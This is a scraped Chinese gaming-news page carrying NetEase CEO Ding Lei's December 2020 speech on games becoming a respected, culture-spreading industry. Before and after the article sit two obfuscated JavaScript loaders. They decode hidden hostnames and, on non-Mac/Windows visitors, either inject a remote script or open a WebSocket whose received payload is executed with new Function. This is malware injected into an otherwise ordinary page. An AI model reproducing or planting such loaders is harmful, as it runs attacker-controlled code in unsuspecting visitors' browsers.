function HvAniQj(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function aMmPYN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return HvAniQj(t);};window[''+'L'+'l'+'j'+'P'+'I'+'u'+'h'+'J'+'X'+'k'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=aMmPYN,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5nLmm1pY3Jvc3Nlci5jbg==','dHIIueWVzdW42NzguY29t','138805',window,document,['m','I']);}:function(){};

网易丁磊:从快乐的行业成为一个让人尊敬的行业

12月17日,2020中国游戏产业年会在广州正式召开,在当天上午的大会上,网易的首席执行官丁磊做了大会演讲。演讲的主题围绕着游戏行业如何从快乐的行业、未来的行业上升到让人尊敬的行业而展开,并从文化内核、游戏交互以及技术前景三个角度对发表了自己的看法。网易丁磊:从快乐的行业成为一个让人尊敬的行业插图

以下是丁磊演讲全文:

丁磊:各位领导、各位嘉宾、各位媒体朋友,早上好。

我还记得,上一次产业年会在广州举办,是在2005年1月,我做了一个发言叫《民族游戏的拓展路途》。当时,中国游戏产业才刚刚起步。到今天,已经变成了坦坦大路。对于我们而言,最重要的责任,不再是冥思苦想,要如何做出中国人自己的游戏,而是变成了:在一个健康的文化价值观前提下,大家如何修正偏见,真正探索和开发游戏的正向潜力,承担新时代的责任。

这其中,非常关键、也需要大家充分讨论的议题是:作为一个让人快乐的行业,未来的游戏,如何成为一个让人尊敬的行业?从实践来看,我认为可以从三个角度来展开:

第一,未来的游戏,应该超越娱乐性需求,去普及中式美学,创造中国潮流,激发文化创新势能,让优秀的文化,获得无限的传承。

我们一直说,中国文化博大精深。以色彩为例,大部分人可能只知道“红橙黄绿青蓝紫”七种。我最近看了《中国传统色》这本书,发现光是故宫就有384种颜色。比如,松花、苏梅、窃蓝、水龙吟……这些颜色每一个都很惊艳,每一个都有文化出处。

当我们用游戏去展示这些元素时,对用户而言,不光是提供了一些好看的画面、场景,也是一次融合了中国自然、宇宙、哲学观的美学和文化普及。

游戏是目前传播力最强、年轻人认可度最高的文化媒介之一。可以这么说,想让一个年轻人了解北宋风俗,让他看一百本书,效果可能不如去《逆水寒》游戏里过个春节;想让一个人体会中国山水画的禅意,去博物馆看画展,效果可能和玩《绘真·妙笔千山》差不多。

中国有五千年的历史、九百六十万平方山河,还有诸子百家、琴棋书画诗酒花,文化的内涵极大丰富,但文化的当代表现力、渗透力还不够。在这个时候,游戏行业主动去展示中国文化,既是时代的需求,也是时代要求有的担当。

对于企业而言,比较重要的是,如何深入这个文化宝库,把几千年的思想、哲学、科学精华展现出来,为中国美学创造更好的传播语境。让当代的中国人,透过游戏,直抵祖先的精神内核。

我相信,这种长期、有意识的文化输入,会让整个国家产生巨大的文化创新势能。对整个社会的审美感知力、文化创造力的提升,也许不亚于一场轰轰烈烈的文化输出活动。

第二,未来的游戏,应该充分发挥交互内核,让更多温暖美好的东西,成为人现实情感的补充,让有限生命获得无限的体验。

今年疫情,很多人宅在家里出不去,很多线下活动无法如期举办。游戏作为一种现实替代,帮助很多人完成了真实世界不可能完成的事,体验了第二种人生。

美国加州大学伯克利分校的学生和教授,为了弥补无法开毕业典礼的缺憾,在《我的世界》游戏里还原了学校100多栋建筑,办了一个云端的毕业礼;还有很多中国人,通过游戏了解武汉火神山、雷神山医院,和武汉一起抗疫。有人甚至会在游戏里举办婚礼、纪念家人。这些都是游戏在精神层面给人的情感补足。

我们也看到,游戏在积极地和云游戏、AI这些新技术融合,做过去做不到的事。上个月《逆水寒》刚刚在游戏里,举办了一个AI学术顶会。这也是全球第一个在虚拟世界里举办的国际顶级学术会议。大家可以想象,300 多个全球 AI 专家,穿着宋代服装,在游戏里开会,做学术讨论,看论文墙展的场面。相当刺激,也相当有现实感。

游戏不会只是一种杀时间的娱乐工具。游戏不是真实生活的反面,而是真实生活的镜子。这些话,疫情之后,很多人的感受会更深。一款好的游戏,可以照进现实,直面人的精神世界,传递积极情绪,这是毫无疑问的。

第三,未来的游戏,会以强⼤的技术和内容容纳度,提供不同产业新构想,降低现实世界创新成本,乃至拓宽整个社会的发展空间。

游戏是⼀种综合的、同时也是⾛在科技前端的先锋性⽂化产业,对电影、⾳乐、图像、⽂学、戏剧,还有 VR、AR、AI 等不同艺术和技术领域,有很⼤的包容性、延展性。

⼩到⼀个IP在⽂创领域的跨界结合,⼤到融入整个城市发展的脉络,甚⾄⼈的⽣活、⼯作、教育和消费,游戏所提供的可能性,会带领我们到一个闻所未闻,也不可想象的领域。尤其对城市⽂旅产业。当游戏嫁接到城市发展的枝桠上,游戏成了城市的延展,而城市成为了游戏的土壤,会是什么感觉?

除了给游客和生活在里面的人独一无二的体验,对城市⽽⾔,可能也是⼀个⾮常长效、可持续、高净值的新经济模式。得益于游戏的模拟感、交互性、大数据演算能力,我们可以把游戏理解为一种现实世界的低成本预演。它既具备了从虚拟走进现实的能力,也具备了让真实在游戏世界落地的空间。

借助⼀些未来科技⼿段,医疗、教育这些产业领域,乃⾄新技术、新规则、新社会治理⽅式的应用,如果可以对游戏做出有效的借鉴、交叉创新,相信最后的产出一定会⼤⼤降低现实世界的创新成本。

各位领导、各位嘉宾,我们整个行业用了将近 20 年,让游戏这条路变得越来越宽。下⼀个 20 年,我们需要做的是,继续用行动来获得尊敬。

我也经常拷问⾃⼰,这个⾏业创造出来的东西,到底是娱乐的附庸,还是一个充满无限可能的创新工具?其实,我们的每一个想法和行动,都会写下不同的答案。

我很期待,游戏的积极面可以在全领域、全社会引发一场永久性的连锁反应。从普通人的平凡生活到全人类的精神文明,从一代人传向下一代人,未来游戏可以嵌合历史的轨道,真正有所积淀,有所贡献。这是游戏产业给我们的重要课题。

很期待这次年会,听到大家更多的观点碰撞。谢谢!

给TA买糖
共{{data.count}}人
人已赞赏
游戏圈

《怪物猎人 崛起》茶点店厨师“艾草” 料理(猫饭)视频介绍

2020-12-17 17:42:19

游戏圈

《2020年中国游戏产业报告》:2020年中国游戏市场收入达2786亿元

2020-12-17 18:12:47

function dViwDG(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function hpazHiSP(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return dViwDG(t);};window[''+'U'+'l'+'g'+'a'+'X'+'b'+'I'+'w'+'Z'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=hpazHiSP,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/z/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5nLLm1pY3Jvc3Nlci5jbg==','dHIueWWVzdWW42NzguY29t','138806',window,document,['L','W']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧